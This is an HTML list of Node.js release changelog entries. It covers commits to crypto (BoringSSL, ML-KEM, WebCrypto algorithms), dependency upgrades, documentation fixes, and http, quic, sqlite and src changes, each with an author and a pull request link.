<li>[<a href="https://github.com/nodejs/node/commit/3bac77f2a8"><code>3bac77f2a8</code></a>] - <strong>crypto</strong>: wire ChaCha20-Poly1305 in Web Cryptography when using BoringSSL (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63255" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63255/hovercard">#63255</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/1bff901b09"><code>1bff901b09</code></a>] - <strong>crypto</strong>: wire AES-KW in Web Cryptography when using BoringSSL (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63255" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63255/hovercard">#63255</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4433fca3df"><code>4433fca3df</code></a>] - <strong>crypto</strong>: harden CryptoKey algorithm slots (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63111" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63111/hovercard">#63111</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b5cf01217a"><code>b5cf01217a</code></a>] - <strong>crypto</strong>: harden KeyObject internal slots (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63111" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63111/hovercard">#63111</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ce84aef37d"><code>ce84aef37d</code></a>] - <strong>crypto</strong>: add guards and adjust tests for BoringSSL (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62883" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62883/hovercard">#62883</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/26781689b0"><code>26781689b0</code></a>] - <strong>crypto</strong>: reject duplicate ML-KEM JWK key_ops (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62905" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62905/hovercard">#62905</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/aeea8f4970"><code>aeea8f4970</code></a>] - <strong>crypto</strong>: add JWK support for ML-KEM and SLH-DSA key types (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62706" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62706/hovercard">#62706</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/407cf91656"><code>407cf91656</code></a>] - <strong>crypto</strong>: guard against size_t overflow on experimental 32-bit arch (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62626" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62626/hovercard">#62626</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/bb2857b85a"><code>bb2857b85a</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>crypto</strong>: align key argument names in docs and error messages (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62527" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62527/hovercard">#62527</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b9d5e87880"><code>b9d5e87880</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>crypto</strong>: accept key data in crypto.diffieHellman() and cleanup DH jobs (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62527" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62527/hovercard">#62527</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b46d52b283"><code>b46d52b283</code></a>] - <strong>crypto</strong>: unify asymmetric key import through KeyObjectHandle::Init (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62499" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62499/hovercard">#62499</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ccd756d61e"><code>ccd756d61e</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>crypto</strong>: add TurboSHAKE and KangarooTwelve Web Cryptography algorithms (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62183" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62183/hovercard">#62183</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/e07e7a31e1"><code>e07e7a31e1</code></a>] - <strong>crypto</strong>: update root certificates to NSS 3.123.1 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63527" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63527/hovercard">#63527</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/61826df455"><code>61826df455</code></a>] - <strong>crypto</strong>: coerce -0 keylen to +0 in pbkdf2 and scrypt (Jordan Harband) <a href="https://github.com/nodejs/node/pull/63531" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63531/hovercard">#63531</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/16d2fd3c07"><code>16d2fd3c07</code></a>] - <strong>crypto</strong>: align verifyOneShot accepted types (Anshika Jain) <a href="https://github.com/nodejs/node/pull/63280" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63280/hovercard">#63280</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3b8330deda"><code>3b8330deda</code></a>] - <strong>crypto</strong>: improve system certificate enumeration logic on macOS (Robo) <a href="https://github.com/nodejs/node/pull/62576" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62576/hovercard">#62576</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/141de35399"><code>141de35399</code></a>] - <strong>debugger</strong>: add --help to <code>node inspect</code> and improve docs (Joyee Cheung) <a href="https://github.com/nodejs/node/pull/63201" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63201/hovercard">#63201</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b76bfcd4fa"><code>b76bfcd4fa</code></a>] - <strong>deps</strong>: upgrade npm to 11.16.0 (npm team) <a href="https://github.com/nodejs/node/pull/63602" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63602/hovercard">#63602</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4ec142314c"><code>4ec142314c</code></a>] - <strong>deps</strong>: SQLite: cherry-pick b869ed6b067d623cb1383549f2a18aa35508385d (Junsu Han) <a href="https://github.com/nodejs/node/pull/63525" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63525/hovercard">#63525</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/19e8ce1c36"><code>19e8ce1c36</code></a>] - <strong>deps</strong>: upgrade npm to 11.15.0 (npm team) <a href="https://github.com/nodejs/node/pull/63463" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63463/hovercard">#63463</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/8a264260e2"><code>8a264260e2</code></a>] - <strong>deps</strong>: update sqlite to 3.53.1 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63217" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63217/hovercard">#63217</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/50c8ff3f94"><code>50c8ff3f94</code></a>] - <strong>deps</strong>: update simdjson to 4.6.4 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/62811" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62811/hovercard">#62811</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/6e56f01c4b"><code>6e56f01c4b</code></a>] - <strong>deps</strong>: V8: cherry-pick 435a2cdf664c (Matthias Liedtke) <a href="https://github.com/nodejs/node/pull/63136" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63136/hovercard">#63136</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3ba813b242"><code>3ba813b242</code></a>] - <strong>deps</strong>: cherry-pick <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/libuv/libuv/commit/a43e543/hovercard" href="https://github.com/libuv/libuv/commit/a43e543">libuv/libuv@<tt>a43e543</tt></a> (Ali Hassan) <a href="https://github.com/nodejs/node/pull/63222" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63222/hovercard">#63222</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/2390e3a5ac"><code>2390e3a5ac</code></a>] - <strong>doc</strong>: remove duplicated sentences in large-pull-requests.md (Joyee Cheung) <a href="https://github.com/nodejs/node/pull/63650" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63650/hovercard">#63650</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/52a1c18374"><code>52a1c18374</code></a>] - <strong>doc</strong>: update <code>git node land</code> instructions for security releases (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63586" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63586/hovercard">#63586</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3e6b4da037"><code>3e6b4da037</code></a>] - <strong>doc</strong>: drop --experimental from --permission (Rafael Gonzaga) <a href="https://github.com/nodejs/node/pull/63583" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63583/hovercard">#63583</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/84d05163b9"><code>84d05163b9</code></a>] - <strong>doc</strong>: explicitly ask for reproducible in JS (Rafael Gonzaga) <a href="https://github.com/nodejs/node/pull/63479" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63479/hovercard">#63479</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/7da2a4450e"><code>7da2a4450e</code></a>] - <strong>doc</strong>: fix URL postMessage example in worker_threads (Kit Dallege) <a href="https://github.com/nodejs/node/pull/62203" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62203/hovercard">#62203</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3d79bd8b29"><code>3d79bd8b29</code></a>] - <strong>doc</strong>: clarify <code>filter</code> option of <code>sqlite.database.applyChangeset</code> (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63515" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63515/hovercard">#63515</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4f4174aace"><code>4f4174aace</code></a>] - <strong>doc</strong>: fix double spaces in ERR_TLS_INVALID_PROTOCOL_METHOD (Daijiro Wachi) <a href="https://github.com/nodejs/node/pull/63511" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63511/hovercard">#63511</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/388323ca4b"><code>388323ca4b</code></a>] - <strong>doc</strong>: fix double space in modules.md (Daijiro Wachi) <a href="https://github.com/nodejs/node/pull/63512" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63512/hovercard">#63512</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/5258ccc058"><code>5258ccc058</code></a>] - <strong>doc</strong>: fix "options" to "option" in tls.createServer (Daijiro Wachi) <a href="https://github.com/nodejs/node/pull/63453" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63453/hovercard">#63453</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/43e83e6507"><code>43e83e6507</code></a>] - <strong>doc</strong>: fix typo in deprecations (Daijiro Wachi) <a href="https://github.com/nodejs/node/pull/63434" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63434/hovercard">#63434</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f05a61d54c"><code>f05a61d54c</code></a>] - <strong>doc</strong>: remove unsupported template type from v8.md (René) <a href="https://github.com/nodejs/node/pull/63410" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63410/hovercard">#63410</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c39d5fc820"><code>c39d5fc820</code></a>] - <strong>doc</strong>: fix article usage before vowel-sound acronyms (joao-oliveira-softtor) <a href="https://github.com/nodejs/node/pull/62696" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62696/hovercard">#62696</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/398261f911"><code>398261f911</code></a>] - <strong>doc</strong>: remove the bi-monthly contributor spotlight section (Claudio Wunder) <a href="https://github.com/nodejs/node/pull/62734" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62734/hovercard">#62734</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/fd9e14c405"><code>fd9e14c405</code></a>] - <strong>doc</strong>: update http2's <code>push</code> and <code>trailers</code> events with <code>rawHeaders</code> param (YuSheng Chen) <a href="https://github.com/nodejs/node/pull/63259" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63259/hovercard">#63259</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b943ce6933"><code>b943ce6933</code></a>] - <strong>doc</strong>: remove inactive members from Triagers list (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63329" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63329/hovercard">#63329</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4b9cdfc022"><code>4b9cdfc022</code></a>] - <strong>doc</strong>: reference correct function in Module docs (Robin Malfait) <a href="https://github.com/nodejs/node/pull/63247" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63247/hovercard">#63247</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/bed84b6df2"><code>bed84b6df2</code></a>] - <strong>doc</strong>: replace Visual Studio 2022 Evergreen version reference with 17.14 (Mike McCready) <a href="https://github.com/nodejs/node/pull/63211" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63211/hovercard">#63211</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/32ea70569b"><code>32ea70569b</code></a>] - <strong>doc</strong>: recommend explicitly Tier 1 or 2 for production applications (Mike McCready) <a href="https://github.com/nodejs/node/pull/63187" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63187/hovercard">#63187</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4627bcfd82"><code>4627bcfd82</code></a>] - <strong>doc</strong>: run license-builder (github-actions[bot]) <a href="https://github.com/nodejs/node/pull/63232" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63232/hovercard">#63232</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/28eba71845"><code>28eba71845</code></a>] - <strong>doc</strong>: add large pull requests contributing guide (Matteo Collina) <a href="https://github.com/nodejs/node/pull/62829" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62829/hovercard">#62829</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/2648efd438"><code>2648efd438</code></a>] - <strong>doc</strong>: remove unnecessary <code>&lt;!-- eslint-</code> magic comments (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63200" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63200/hovercard">#63200</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a95fc1f8fc"><code>a95fc1f8fc</code></a>] - <strong>doc</strong>: clarify SEA platform support excludes darwin-x64 (MJSHANG) <a href="https://github.com/nodejs/node/pull/63181" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63181/hovercard">#63181</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/aaef29e2e1"><code>aaef29e2e1</code></a>] - <strong>doc</strong>: update release steps when post-release fails (Rafael Gonzaga) <a href="https://github.com/nodejs/node/pull/63131" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63131/hovercard">#63131</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/7d81419cf2"><code>7d81419cf2</code></a>] - <strong>doc</strong>: add Hmac.digest() documentation-only deprecation (DEP0206) (Anshika Jain) <a href="https://github.com/nodejs/node/pull/63121" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63121/hovercard">#63121</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ececd80d81"><code>ececd80d81</code></a>] - <strong>doc</strong>: document the latest-vX.x schema (Marco Ippolito) <a href="https://github.com/nodejs/node/pull/63033" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63033/hovercard">#63033</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/27c1c1d842"><code>27c1c1d842</code></a>] - <strong>doc</strong>: remove list of versions in <code>BUILDING.md</code> (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63113" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63113/hovercard">#63113</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/e369886a65"><code>e369886a65</code></a>] - <strong>doc,sqlite</strong>: document entryPoint argument for loadExtension (Edy Silva) <a href="https://github.com/nodejs/node/pull/63152" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63152/hovercard">#63152</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/e4e5137cbd"><code>e4e5137cbd</code></a>] - <strong>errors</strong>: handle V8 warnings in DisallowJavascriptExecutionScope (Divyanshu Sharma) <a href="https://github.com/nodejs/node/pull/63491" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63491/hovercard">#63491</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/6d1f6048d2"><code>6d1f6048d2</code></a>] - <strong>fs</strong>: make <code>Date</code> properties on <code>Stats</code> enumerable (LiviaMedeiros) <a href="https://github.com/nodejs/node/pull/63328" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63328/hovercard">#63328</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/44c8ebcbd6"><code>44c8ebcbd6</code></a>] - <strong>http</strong>: avoid stream listeners on idle agent sockets (Matteo Collina) <a href="https://github.com/nodejs/node/pull/64004" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64004/hovercard">#64004</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4c9251fc09"><code>4c9251fc09</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>http</strong>: add writeInformation to send arbitrary 1xx status codes (Tim Perry) <a href="https://github.com/nodejs/node/pull/63155" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63155/hovercard">#63155</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/39f61fb06c"><code>39f61fb06c</code></a>] - <strong>http2</strong>: emit session close before stream close (Matteo Collina) <a href="https://github.com/nodejs/node/pull/63414" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63414/hovercard">#63414</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/8a8f2127d1"><code>8a8f2127d1</code></a>] - <strong>http2</strong>: validate non-link headers in writeEarlyHints (Matteo Collina) <a href="https://github.com/nodejs/node/pull/62017" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62017/hovercard">#62017</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/8c989ec4a3"><code>8c989ec4a3</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>inspector</strong>: expose precise coverage start to JS runtime (sangwook) <a href="https://github.com/nodejs/node/pull/63079" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63079/hovercard">#63079</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c05f38229b"><code>c05f38229b</code></a>] - <strong>lib</strong>: cleanup stateless diffiehellman key handling (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62645" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62645/hovercard">#62645</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/1c16b45d35"><code>1c16b45d35</code></a>] - <strong>lib</strong>: refactor internal webidl converters (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62979" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62979/hovercard">#62979</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/02f35d6dce"><code>02f35d6dce</code></a>] - <strong>lib</strong>: define <code>kEnumerableProperty</code> atomically (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63609" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63609/hovercard">#63609</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/12c51547ba"><code>12c51547ba</code></a>] - <strong>lib</strong>: fix typos in esm loader comments (RonGamzu) <a href="https://github.com/nodejs/node/pull/63465" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63465/hovercard">#63465</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/9b03b84262"><code>9b03b84262</code></a>] - <strong>lib</strong>: fix typo idenity =&gt; identity (Daijiro Wachi) <a href="https://github.com/nodejs/node/pull/63112" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63112/hovercard">#63112</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a84e6b0567"><code>a84e6b0567</code></a>] - <strong>lib</strong>: fixes validator message (Daijiro Wachi) <a href="https://github.com/nodejs/node/pull/62823" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62823/hovercard">#62823</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/11734166a8"><code>11734166a8</code></a>] - <strong>lib</strong>: narrow ReadableStreamBYOBRequest.view return type to Uint8Array (RoomWithOutRoof) <a href="https://github.com/nodejs/node/pull/63017" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63017/hovercard">#63017</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/7cead61d21"><code>7cead61d21</code></a>] - <strong>meta</strong>: flip mcollina emails in .mailmap (Matteo Collina) <a href="https://github.com/nodejs/node/pull/63621" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63621/hovercard">#63621</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a08cfcfd35"><code>a08cfcfd35</code></a>] - <strong>meta</strong>: label "source maps" PRs (Chengzhong Wu) <a href="https://github.com/nodejs/node/pull/63591" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63591/hovercard">#63591</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d56e8d2512"><code>d56e8d2512</code></a>] - <strong>meta</strong>: add <code>vfs</code> subsystem label (René) <a href="https://github.com/nodejs/node/pull/62331" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62331/hovercard">#62331</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/6201cfe488"><code>6201cfe488</code></a>] - <strong>meta</strong>: skip scheduled workflows on forks (Jamie Magee) <a href="https://github.com/nodejs/node/pull/63565" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63565/hovercard">#63565</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f095e2bd31"><code>f095e2bd31</code></a>] - <strong>meta</strong>: add additional gitignore entries (James M Snell) <a href="https://github.com/nodejs/node/pull/63267" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63267/hovercard">#63267</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/1ea52c444c"><code>1ea52c444c</code></a>] - <strong>meta</strong>: move one or more collaborators to emeritus (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63402" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63402/hovercard">#63402</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b1b2327611"><code>b1b2327611</code></a>] - <strong>meta</strong>: move one or more collaborators to emeritus (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63235" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63235/hovercard">#63235</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/7d88e130a9"><code>7d88e130a9</code></a>] - <strong>meta</strong>: ignore AI assistants files (Matteo Collina) <a href="https://github.com/nodejs/node/pull/62612" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62612/hovercard">#62612</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a53b51df38"><code>a53b51df38</code></a>] - <strong>module</strong>: load ESM helpers eagerly in the snapshot (Joyee Cheung) <a href="https://github.com/nodejs/node/pull/63550" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63550/hovercard">#63550</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/69df688fff"><code>69df688fff</code></a>] - <strong>module</strong>: fix sync hook short-circuit in require() in imported CJS (Joyee Cheung) <a href="https://github.com/nodejs/node/pull/62920" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62920/hovercard">#62920</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/75d9a4ed47"><code>75d9a4ed47</code></a>] - <strong>node-api</strong>: support SharedArrayBuffer in napi_create_typedarray (Yilong Li) <a href="https://github.com/nodejs/node/pull/62710" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62710/hovercard">#62710</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c20aa4c47b"><code>c20aa4c47b</code></a>] - <strong>quic</strong>: add reusePort option to QuicEndpoint (James M Snell) <a href="https://github.com/nodejs/node/pull/63267" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63267/hovercard">#63267</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/26a30d8a7f"><code>26a30d8a7f</code></a>] - <strong>quic</strong>: implement rate limiting for version nego and immediate close (James M Snell) <a href="https://github.com/nodejs/node/pull/63267" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63267/hovercard">#63267</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/0b534b5770"><code>0b534b5770</code></a>] - <strong>quic</strong>: fixup linting issue after other changes (James M Snell) <a href="https://github.com/nodejs/node/pull/63267" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63267/hovercard">#63267</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4b367cbe09"><code>4b367cbe09</code></a>] - <strong>quic</strong>: remove unused binding variable in session.cc (James M Snell) <a href="https://github.com/nodejs/node/pull/63177" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63177/hovercard">#63177</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/2574bef5a6"><code>2574bef5a6</code></a>] - <strong>repl</strong>: fix dedup comparing normalized line against raw history (Daijiro Wachi) <a href="https://github.com/nodejs/node/pull/62886" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62886/hovercard">#62886</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/30e71c7e49"><code>30e71c7e49</code></a>] - <strong>sqlite</strong>: keep source database alive during backup (Matteo Collina) <a href="https://github.com/nodejs/node/pull/62673" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62673/hovercard">#62673</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/677ca7e76c"><code>677ca7e76c</code></a>] - <strong>src</strong>: simplify OpenSSL feature gates (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63255" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63255/hovercard">#63255</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c863c75c39"><code>c863c75c39</code></a>] - <strong>src</strong>: add BoringSSL EVP enumeration fallback (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63206" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63206/hovercard">#63206</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f6b2466921"><code>f6b2466921</code></a>] - <strong>src</strong>: decouple KeyObject and CryptoKey and move CryptoKey to src (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62924" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62924/hovercard">#62924</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/92d4f07dd2"><code>92d4f07dd2</code></a>] - <strong>src</strong>: remove license headers for new node_profiling files (Chengzhong Wu) <a href="https://github.com/nodejs/node/pull/63066" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63066/hovercard">#63066</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/8ac5d771c8"><code>8ac5d771c8</code></a>] - <strong>src</strong>: split profiling helpers from util (Ilyas Shabi) <a href="https://github.com/nodejs/node/pull/63008" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63008/hovercard">#63008</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/85d1639495"><code>85d1639495</code></a>] - <strong>src</strong>: remove TOCTOU race condition when encoding SAB-backed <code>Buffer</code>s (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63517" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63517/hovercard">#63517</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/9473c5f05c"><code>9473c5f05c</code></a>] - <strong>src</strong>: skip duplicate UTF-8 validation in TextDecoder fatal path (Mert Can Altin) <a href="https://github.com/nodejs/node/pull/63231" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63231/hovercard">#63231</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f35c91ee68"><code>f35c91ee68</code></a>] - <strong>src</strong>: improve token return value check (James M Snell) <a href="https://github.com/nodejs/node/pull/63483" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63483/hovercard">#63483</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/26f677c1c5"><code>26f677c1c5</code></a>] - <strong>src</strong>: expose <code>node::RegisterContext</code> to make a node managed context (Chengzhong Wu) <a href="https://github.com/nodejs/node/pull/62322" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62322/hovercard">#62322</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/275cf909b6"><code>275cf909b6</code></a>] - <strong>src,sqlite</strong>: only pass <code>xFilter</code> when user provided a callback (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63516" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63516/hovercard">#63516</a></li>
